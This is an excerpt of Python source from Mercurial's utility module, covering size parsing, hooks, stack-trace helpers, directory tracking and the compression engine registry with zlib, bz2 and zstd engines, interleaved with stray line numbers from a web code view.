              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    normalized = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if normalized.endswith(suffix):
                number = normalized[:-len(suffix)]
                return int(float(number) * multiplier)
        # no recognized suffix: a plain integer count of bytes
        return int(normalized)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3104
3104
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source-name, callable) pairs
        self._hooks = []

    def add(self, source, hook):
        """Register *hook* under *source*; source name drives call order."""
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # sort lazily at call time so registration order never matters
        self._hooks.sort(key=lambda pair: pair[0])
        return [hook(*args) for _source, hook in self._hooks]
3122
3122
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not be used in production code but very convenient while developing.
    '''
    # [:-skip - 1] drops the 'skip' innermost frames plus this function's
    # own frame; [-depth:] then keeps the outermost 'depth' entries
    # (depth=0 keeps everything, since [-0:] is the whole list).
    entries = [(fileline % (fn, ln), func)
        for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
        ][-depth:]
    if entries:
        # width of the widest file:line column, for aligned output
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)
3145
3145
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    # flush the other stream first so interleaved stdout/stderr output
    # appears in a sensible order on the terminal
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 also hides this helper's own frame from the trace
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()
3160
3160
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> number of tracked paths beneath it
        self._dirs = {}
        if skip is not None and safehasattr(map, 'iteritems'):
            # dirstate-style mapping: honor the 'skip' state filter
            for f, s in map.iteritems():
                if s[0] != skip:
                    self.addpath(f)
        else:
            for f in map:
                self.addpath(f)

    def addpath(self, path):
        # Walk ancestors deepest-first; stop at the first one already
        # present, since its own ancestors were counted when it was added.
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        # Reverse of addpath: drop entries whose count hits zero, and stop
        # at the first ancestor that is still shared with another path.
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3196
3196
# Prefer the C implementation of 'dirs' when the parsers module provides
# one; it is used as a drop-in replacement for the pure-Python class above.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3199
3199
def finddirs(path):
    """Yield every ancestor directory of *path*, deepest first.

    A path with no '/' yields nothing; a leading '/' ultimately yields
    the empty string as the shallowest ancestor.
    """
    components = path.split('/')
    for end in range(len(components) - 1, 0, -1):
        yield '/'.join(components[:end])
3205
3205
3206 # compression code
3206 # compression code
3207
3207
# Roles used when asking which compression engines apply to a side of the
# wire protocol (see compressormanager.supportedwireengines below).
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire-protocol support: its wire name plus the
# priorities (higher sorts first) used when acting as server or client.
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3214
3214
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # engine name -> compressionengine instance
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        # Each optional capability (bundle, wire proto, revlog header) is
        # validated for conflicts before its lookup map is updated.
        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        # user-facing "bundle spec" names with a registered engine
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        # internal bundle identifiers with a registered engine
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        # Like forbundlename/forbundletype, but keyed by wire identifier.
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3368
3368
# The global registry instance against which compression engines register.
compengines = compressormanager()
3370
3370
class compressionengine(object):
    """Base class for compression engines.

    Concrete engines subclass this, implement the relevant subset of the
    interface below, and register an instance with the engine manager.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        Lets optional engines (such as ones relying on C extensions that
        may be absent from an installation) report that they cannot be
        used. Defaults to available.
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        Returns None when this engine isn't supported for bundles.

        Otherwise returns a 2-tuple of strings: the user-facing
        "bundle spec" compression name and an internal identifier used to
        denote the compression format within bundles. Setting the first
        element to ``None`` excludes the name from external usage.

        When bundle compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell
        users about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        Returns None when this engine isn't supported for compressing wire
        protocol payloads.

        Otherwise returns ``compenginewireprotosupport`` with these fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities order the advertisement of format support
        by server and client: highest integer first, and non-positive
        values aren't advertised at all.

        The priority values are somewhat arbitrary and only used for
        default ordering; the relative order can be changed via config
        options.

        When wire protocol compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        When this engine can compress revlogs, returns the bytes used to
        identify chunks compressed with this engine. Returns ``None``
        (the default) to indicate the engine does not participate in
        revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        Receives an iterator (ideally a generator) of chunks of bytes to
        be compressed and returns an iterator (ideally a generator) of
        bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform
        compression; each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method returning
        compressed data. Return value is an object with a ``read(size)``
        returning uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. It returns compressed binary data or ``None`` when the data
        could not be compressed (too small, not compressible, etc). The
        returned data should carry a header uniquely identifying this
        compression format so decompression can be routed here; that
        header should match the ``revlogheader()`` return value.

        The object has a ``decompress(data)`` method that decompresses
        data. It will only be called when ``data`` begins with
        ``revlogheader()``, and should return the raw, uncompressed data
        or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3487
3487
class _zlibengine(compressionengine):
    """Compression engine backed by the stdlib ``zlib`` module."""

    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        options = opts or {}

        compobj = zlib.compressobj(options.get('level', -1))
        for piece in it:
            out = compobj.compress(piece)
            # zlib buffers internally, so not every call emits data.
            # Checking here is cheaper than pushing empty chunks through
            # the generator.
            if out:
                yield out

        yield compobj.flush()

    def decompressorreader(self, fh):
        def chunks():
            dobj = zlib.decompressobj()
            for raw in filechunkiter(fh):
                while raw:
                    # Cap output chunk size (256KB) to bound memory use.
                    yield dobj.decompress(raw, 2 ** 18)
                    raw = dobj.unconsumed_tail

        return chunkbuffer(chunks())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Too small to be worth compressing.
                return None
            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # zlib makes an internal copy of the input buffer, which
                # doubles memory usage for large inputs, so compress
                # incrementally in 1MB windows instead.
                compobj = zlib.compressobj()
                pieces = []
                offset = 0
                while offset < insize:
                    end = offset + 2 ** 20
                    pieces.append(compobj.compress(data[offset:end]))
                    offset = end
                pieces.append(compobj.flush())

                if sum(map(len, pieces)) < insize:
                    return ''.join(pieces)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3574
3574
class _bz2engine(compressionengine):
    """Compression engine backed by the stdlib ``bz2`` module."""

    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # A protocol name is declared but not advertised by default (both
    # priorities are 0) because bzip2 is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        options = opts or {}
        compobj = bz2.BZ2Compressor(options.get('level', 9))
        for piece in it:
            out = compobj.compress(piece)
            if out:
                yield out

        yield compobj.flush()

    def decompressorreader(self, fh):
        def chunks():
            dobj = bz2.BZ2Decompressor()
            for raw in filechunkiter(fh):
                yield dobj.decompress(raw)

        return chunkbuffer(chunks())

compengines.register(_bz2engine())
3617
3617
class _truncatedbz2engine(compressionengine):
    """Decompression-only engine for bzip2 streams lacking the 'BZ' magic."""

    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-facing name: this format is internal-only.
        return None, '_truncatedBZ'

    # compressstream is intentionally not implemented because producing
    # this format is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def chunks():
            dobj = bz2.BZ2Decompressor()
            # The input stream doesn't have the 'BZ' header, so prime the
            # decompressor with it before feeding the real data.
            dobj.decompress('BZ')
            for raw in filechunkiter(fh):
                yield dobj.decompress(raw)

        return chunkbuffer(chunks())

compengines.register(_truncatedbz2engine())
3638
3638
class _noopengine(compressionengine):
    """Pass-through engine that performs no compression at all."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # revlogheader is deliberately not implemented here because the
    # uncompressed case is handled specially in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity transform: the input chunks are already "compressed".
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Never claims to have compressed anything.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3673
3673
class _zstdengine(compressionengine):
    """Compression engine backed by the optional bundled ``zstd`` module."""

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available, so defer the
        # import until first access and cache the result.
        try:
            from . import zstd
            # Touch an attribute to force the delayed import to resolve.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        options = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = options.get('level', 3)

        zstd = self._module
        compobj = zstd.ZstdCompressor(level=level).compressobj()
        for piece in it:
            out = compobj.compress(piece)
            if out:
                yield out

        yield compobj.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output, but
            # it lets decompression pre-allocate a buffer for the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small to be worth compressing.
                return None
            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Stream large inputs in recommended-size windows.
                compobj = self._cctx.compressobj()
                pieces = []
                offset = 0
                while offset < insize:
                    end = offset + self._compinsize
                    piece = compobj.compress(data[offset:end])
                    if piece:
                        pieces.append(piece)
                    offset = end
                pieces.append(compobj.flush())

                if sum(map(len, pieces)) < insize:
                    return ''.join(pieces)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                pieces = []
                offset = 0
                while offset < insize:
                    end = offset + self._decompinsize
                    piece = dobj.decompress(data[offset:end])
                    if piece:
                        pieces.append(piece)
                    offset = end
                # The frame should be exhausted at this point, so there is
                # no finish() API to call.

                return ''.join(pieces)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
3802
3802
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # The docstring needs formatting, so park the formatted text on a
    # throwaway object/type instead of mutating the original method.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        # Skip engines with no user-facing bundle spec name.
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n %s') % (
            bt[0], engine.bundletype.__doc__)

        entry = docobject()
        entry.__doc__ = doc
        entry._origdoc = engine.bundletype.__doc__
        entry._origfunc = engine.bundletype

        items[bt[0]] = entry

    return items
3834
3834
# Collect the formatted bundle compression docs (items with .__doc__).
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3839
3839
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    taken = others if others is not None else set()

    # First try the bare oldname~tag form.
    candidate = '%s~%s' % (f, tag)
    if candidate not in ctx and candidate not in taken:
        return candidate
    # Otherwise append increasing numeric suffixes until one is free.
    for suffix in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, suffix)
        if candidate not in ctx and candidate not in taken:
            return candidate
General Comments 0
You need to be logged in to leave comments. Login now